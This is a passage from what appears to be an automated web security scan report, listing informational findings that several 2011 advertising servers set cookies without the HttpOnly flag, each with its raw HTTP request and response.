document.write('<a target=\"_blank\" href=\"http://ads.bluelithium.com/clk?3,eAGVUclym0AQ.ZmcUgqzwoxMTblGGowgLELGdtANEAKzCCLkkq2vNxU5dq7pQ.frrt5eNyKmQbIdS2GazfeU6YybiGBS5BySdD-Dpmkac4wp0SmfSdlIGRShHS0
...[SNIP]...

10.26. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?_PVID=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA&Z=300x100&cb=1315313288506222&x=http%3A%2F%2Fglobal%2Eard%2Eyahoo%2Ecom%2FSIG%3D15qi08f92%2FM%3D787833%2E14800347%2E14555521%2E14177427%2FD%3Dsports%2FS%3D25664825%3AMREC%2F%5Fylt%3DAjV6qkbscsOrHRx5YKOYi005nYcB%2FY%3DYAHOO%2FEXP%3D1315320488%2FL%3DsXNjgGKIPE7pARpjTl%2EwjQMmMhd7ak5mFogABMWA%2FB%3D0tSRQtBDRmU%2D%2FJ%3D1315313288506222%2FK%3DY8q4t3xfDwCLgDPxHMEVwQ%2FA%3D6454134%2FR%3D0%2F%2A%24&S=14800347&i=140509&ycg=&yyob=&zip=&_salt=1959032721&B=10&u=http%3A%2F%2Fsports.yahoo.com%2F&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA&ad_type=iframe&ad_size=300x100&site=140509&section_code=14800347&cb=1315313288506222&zip=&ycg=&yyob=&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15qi08f92/M=787833.14800347.14555521.14177427/D=sports/S=25664825:MREC/_ylt=AjV6qkbscsOrHRx5YKOYi005nYcB/Y=YAHOO/EXP=1315320488/L=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA/B=0tSRQtBDRmU-/J=1315313288506222/K=Y8q4t3xfDwCLgDPxHMEVwQ/A=6454134/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; lifb=0EA2)A9.-BM5Jkn/>M1M.hWHO; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f8u=3p6!M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; liday1=fh'jT*YKlx8SkUrhG%Lm!79C8>U9f4; ih="b!!!!/!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!$=3f8u!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r!BKZI(BgvR-4M6EqoyOxB!!w[/!79C8S3FdY; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:10 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0228.rm.sp2
Set-Cookie: ih="b!!!!#!2t)f!!!!#=3f<!"; path=/; expires=Thu, 05-Sep-2013 12:48:10 GMT
Set-Cookie: vuday1=BgvR)!79C8gzv0u; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: uid=uid=79ea9bbe-d886-11e0-97e0-78e7d1fa057c&_hmacv=1&_salt=4168856251&_keyid=k1&_hmac=ad550835999ed68f54bf7c02c64a09ed5b35b47e; path=/; expires=Thu, 06-Oct-2011 12:48:10 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:48:10 GMT
Pragma: no-cache
Content-Length: 954
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<a target=\"_blank\" href=\"http://ads.bluelithium.com/clk?3,eAGlUdtyokAQ.Zl92soyw1yYMdQ8DBcVceSiRPFli2DEICwqbGny9csuWSvv6Zc-3V19TvVpHZujHO0JYQiNaIb4CzV1jPBLzmHOjQdomiZjFDNM-mrjJ46c2gt
...[SNIP]...

10.27. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1291642&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!(!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE"; bh="b!!!#A!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:24:25 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#B!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!$=3f*7!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; path=/; expires=Thu, 05-Sep-2013 12:24:25 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1034849195/?label=mn2ICOXBzQMQq5e67QM&amp;guid=ON&amp;script=0
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:24:25 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


10.28. http://ads.bridgetrack.com/site/rtgt.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /site/rtgt.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/rtgt.asp?BU=163&ref=http%3A//www.fairpoint.com/&p=http%3A//www.fairpoint.com/residential/&r=0.612211185041815&PostalCode=05874 HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/residential/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA=GUID=D289B20CD44A4C5EBF5FA5F78D6E164C; BTASES=SID=7E5654075C924D7888A472B3499F867A; BTA163=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Mon, 05 Sep 2011 12:52:29 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: BTA163=GUID=D289B20CD44A4C5EBF5FA5F78D6E164C; expires=Fri, 31-Aug-2012 04:00:00 GMT; path=/
Set-Cookie: BTASES=SID=7E5654075C924D7888A472B3499F867A; path=/
Set-Cookie: BTA=GUID=D289B20CD44A4C5EBF5FA5F78D6E164C; expires=Fri, 31-Aug-2012 04:00:00 GMT; path=/
Date: Tue, 06 Sep 2011 12:52:28 GMT
Connection: close
Content-Length: 0


10.29. http://ads.lucidmedia.com/clicksense/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.lucidmedia.com
Path:   /clicksense/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/pixel?id=100842&t=s HTTP/1.1
Host: ads.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/premier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 11:59:02 GMT
Expires: Tue, 06 Sep 2011 11:59:03 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awswrh19/127.0.0.1
Set-Cookie: 2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Wed, 05-Sep-2012 11:59:03 GMT; Path=/
Content-Type: text/javascript
Content-Length: 0
Connection: close


10.30. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=160x600_bot&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pgatour.com
Path:   /js.ng/site=ymlb&ymlb_pos=160x600_bot&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ymlb&ymlb_pos=160x600_bot&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568 HTTP/1.1
Host: ads.pgatour.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:20 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a27-19737-91675470-1315313420; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad52:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Tue, 06 Sep 2011 12:50:20 GMT
Pragma: no-cache
Content-Length: 166
Content-Type: application/x-javascript

document.write('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n<html>\n<body style=\"margin: 0px;\">\n<!--FlightID: 4621-->\n\n</body>\n</html>');

10.31. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=300x250_rgt&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pgatour.com
Path:   /js.ng/site=ymlb&ymlb_pos=300x250_rgt&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ymlb&ymlb_pos=300x250_rgt&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568 HTTP/1.1
Host: ads.pgatour.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:20 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a27-15590-1471898671-1315313420; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad52:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Tue, 06 Sep 2011 12:50:20 GMT
Pragma: no-cache
Content-Length: 166
Content-Type: application/x-javascript

document.write('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n<html>\n<body style=\"margin: 0px;\">\n<!--FlightID: 4621-->\n\n</body>\n</html>');

10.32. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=954x60_spon&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pgatour.com
Path:   /js.ng/site=ymlb&ymlb_pos=954x60_spon&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ymlb&ymlb_pos=954x60_spon&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568 HTTP/1.1
Host: ads.pgatour.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:20 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a24-24085-1374961686-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad52:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Tue, 06 Sep 2011 12:50:20 GMT
Pragma: no-cache
Content-Length: 166
Content-Type: application/x-javascript

document.write('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n<html>\n<body style=\"margin: 0px;\">\n<!--FlightID: 4621-->\n\n</body>\n</html>');

10.33. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-5&r=0.34970951941795647&server=polRedir HTTP/1.1
Host: ads.pointroll.com
